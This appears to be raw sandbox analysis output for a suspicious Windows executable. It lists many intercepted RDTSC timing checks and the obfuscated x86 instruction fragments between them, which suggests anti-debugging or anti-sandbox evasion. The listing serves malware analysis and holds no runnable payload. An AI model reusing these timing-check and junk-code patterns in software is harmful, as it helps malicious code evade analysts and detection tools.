                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E451D second address: 7E459C instructions: 0x00000000 rdtsc 0x00000002 je 00007FECB125BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b add dword ptr [esp], 406280F1h 0x00000012 or ecx, dword ptr [ebp+122D3813h] 0x00000018 and edx, 10B23574h 0x0000001e push 00000003h 0x00000020 mov edi, eax 0x00000022 push 00000000h 0x00000024 jl 00007FECB125BFC7h 0x0000002a clc 0x0000002b push 00000003h 0x0000002d mov esi, dword ptr [ebp+122D38A3h] 0x00000033 push 8475F3E0h 0x00000038 push esi 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c pop edx 0x0000003d pop esi 0x0000003e add dword ptr [esp], 3B8A0C20h 0x00000045 mov dword ptr [ebp+122D2555h], eax 0x0000004b lea ebx, dword ptr [ebp+124563DBh] 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007FECB125BFC8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 00000019h 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b mov ecx, edx 0x0000006d xchg eax, ebx 0x0000006e push eax 0x0000006f push edx 0x00000070 jnp 00007FECB125BFCCh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E459C second address: 7E45A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E45A0 second address: 7E45AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FECB125BFC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E45AA second address: 7E45BC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4660 second address: 7E46ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FECB125BFCCh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FECB125BFCEh 0x00000019 popad 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007FECB125BFCBh 0x00000024 pop eax 0x00000025 jnc 00007FECB125BFD2h 0x0000002b je 00007FECB125BFCCh 0x00000031 mov edx, dword ptr [ebp+122D36CFh] 0x00000037 push 00000003h 0x00000039 xor edx, dword ptr [ebp+122D3963h] 0x0000003f push 00000000h 0x00000041 sbb si, AFE3h 0x00000046 push 00000003h 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FECB125BFC8h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 push AA5B6FECh 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E46ED second address: 7E4743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007FECB0CC2D06h 0x0000000d pop eax 0x0000000e popad 0x0000000f add dword ptr [esp], 15A49014h 0x00000016 jmp 00007FECB0CC2D19h 0x0000001b push esi 0x0000001c or edx, dword ptr [ebp+122D36F3h] 0x00000022 pop ecx 0x00000023 lea ebx, dword ptr [ebp+124563E4h] 0x00000029 xchg eax, ebx 0x0000002a jno 00007FECB0CC2D0Eh 0x00000030 push eax 0x00000031 push esi 0x00000032 jg 00007FECB0CC2D0Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E482D second address: 7E4855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007FECB125BFE4h 0x0000000f pushad 0x00000010 jmp 00007FECB125BFD6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4908 second address: 7E490C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8039EA second address: 8039EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8039EE second address: 803A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jg 00007FECB0CC2D06h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jnc 00007FECB0CC2D06h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803B7F second address: 803B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803B8A second address: 803B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803B8E second address: 803B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D22 second address: 803D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803D2C second address: 803D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803E84 second address: 803E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803E8B second address: 803E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FECB125BFC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8042CD second address: 8042D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8045CF second address: 8045D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804736 second address: 80473B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80473B second address: 80474D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB125BFCEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80474D second address: 804751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804751 second address: 80475F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FECB125BFCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8048CF second address: 8048D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804A3F second address: 804A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804A43 second address: 804A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FECB0CC2D12h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804BC3 second address: 804BE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FECB125BFD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007FECB125BFC6h 0x00000012 jp 00007FECB125BFC6h 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804BE7 second address: 804BEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804BEC second address: 804C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FECB125BFC6h 0x0000000f js 00007FECB125BFC6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F83EC second address: 7F83FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F83FB second address: 7F8406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FECB125BFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8406 second address: 7F8422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB0CC2D16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4519 second address: 7D4535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FECB125BFCEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4535 second address: 7D453A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804D5E second address: 804D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804D62 second address: 804D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FECB0CC2D06h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804D70 second address: 804D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FECB125BFC6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FECB125BFD1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804D92 second address: 804DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FECB0CC2D17h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805831 second address: 805837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805837 second address: 80583B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805AB1 second address: 805AEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FECB125BFD2h 0x0000000c je 00007FECB125BFC6h 0x00000012 jmp 00007FECB125BFD9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805AEB second address: 805AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8080EC second address: 8080F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FECB125BFC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806A38 second address: 806A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FECB0CC2D0Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806A51 second address: 806A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807242 second address: 80724D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FECB0CC2D06h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80835F second address: 808363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BCB9 second address: 80BCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB0CC2D16h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BCD3 second address: 80BCD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BCD7 second address: 80BCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80BCDD second address: 80BCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80D3A7 second address: 80D3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80D3AB second address: 80D3D3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECB125BFC6h 0x00000008 jmp 00007FECB125BFD4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FECB125BFCAh 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80D3D3 second address: 80D3EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB0CC2D11h 0x00000009 jbe 00007FECB0CC2D06h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80D3EE second address: 80D3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0F46 second address: 7D0F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007FECB0CC2D0Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0F61 second address: 7D0F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0F65 second address: 7D0F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812925 second address: 812929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812929 second address: 812936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812936 second address: 81296A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB125BFD9h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FECB125BFCDh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81296A second address: 812981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB0CC2D11h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812981 second address: 812985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 812AF3 second address: 812B01 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81309E second address: 8130A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8130A6 second address: 8130C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FECB0CC2D16h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8152CE second address: 8152D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8152D2 second address: 8152D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8152D6 second address: 81534E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 0E787B48h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FECB125BFC8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov edi, 7250A0D9h 0x0000002d call 00007FECB125BFC9h 0x00000032 jmp 00007FECB125BFD0h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a jns 00007FECB125BFC6h 0x00000040 pop eax 0x00000041 pop edx 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 jmp 00007FECB125BFD9h 0x0000004b mov eax, dword ptr [eax] 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push edi 0x00000051 pop edi 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815623 second address: 815647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jmp 00007FECB0CC2D11h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FECB0CC2D08h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815B29 second address: 815B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FECB125BFC6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816518 second address: 81651D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81651D second address: 81656C instructions: 0x00000000 rdtsc 0x00000002 js 00007FECB125BFC8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FECB125BFC8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D39A3h] 0x0000002d jmp 00007FECB125BFCCh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jo 00007FECB125BFCCh 0x0000003b jne 00007FECB125BFC6h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818991 second address: 818997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AA79 second address: 81AA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AA7D second address: 81AA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81AA81 second address: 81AA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DC96D second address: 7DC993 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FECB0CC2D0Bh 0x0000000d jmp 00007FECB0CC2D13h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CEDB second address: 81CEEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FECB125BFC6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81CEEE second address: 81CEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E510 second address: 81E570 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FECB125BFC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D57DCh] 0x00000015 mov si, ax 0x00000018 push 00000000h 0x0000001a xor edi, 03365BA4h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007FECB125BFC8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c xor esi, dword ptr [ebp+122D368Bh] 0x00000042 xchg eax, ebx 0x00000043 push ecx 0x00000044 jc 00007FECB125BFC8h 0x0000004a pushad 0x0000004b popad 0x0000004c pop ecx 0x0000004d push eax 0x0000004e jc 00007FECB125BFD8h 0x00000054 push eax 0x00000055 push edx 0x00000056 jng 00007FECB125BFC6h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81E570 second address: 81E574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81FF58 second address: 81FF67 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECB125BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ED93 second address: 81ED9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FECB0CC2D06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8204D4 second address: 8204E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jns 00007FECB125BFC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8205A3 second address: 8205A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8205A8 second address: 8205B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FECB125BFC6h 0x0000000a rdtsc
